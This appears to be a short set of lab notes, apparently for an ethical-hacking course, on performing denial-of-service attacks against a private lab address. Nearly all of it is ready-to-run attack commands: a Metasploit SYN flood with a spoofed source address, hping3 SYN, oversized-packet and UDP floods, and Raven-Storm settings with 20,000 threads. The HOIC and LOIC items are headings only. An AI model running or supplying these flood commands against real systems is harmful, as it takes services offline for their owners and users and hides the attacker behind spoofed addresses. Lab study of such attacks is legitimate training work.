1. Perform DOS and DDOS with various techniques

1. Perform DOS (syn flooding) using Metasploit

use auxillary/dos/tcp/synflood
set RHOST 192.168.18.110
set RPORT 21
set SHOST 192.168.18.1    \\Spoofed IP
exploit

2. Perform DOS attack using HPing3

hping3 -S 192.168.18.110 -a 192.168.18.1 -p 22 --flood

-S sets the syn flag

-a spoof the address

--flood sends a large no of packets

Ping of death

hping3 -d 65538 -S -p 22 --flood 192.168.18.110 

-d sets the data size

UDP protocol flooding on NetBios (139)

hping3 -2 -p 139 --flood 192.168.18.110  \\-2 specifies the UDP mode

3. Perform a DOS attack using Rven-Storm

sudo rst
l4
ip 192.168.18.110
port 8080
threads 20000
run

4. Perform DDOS using HOIC

5. Perform DDOS using LOIC

Last updated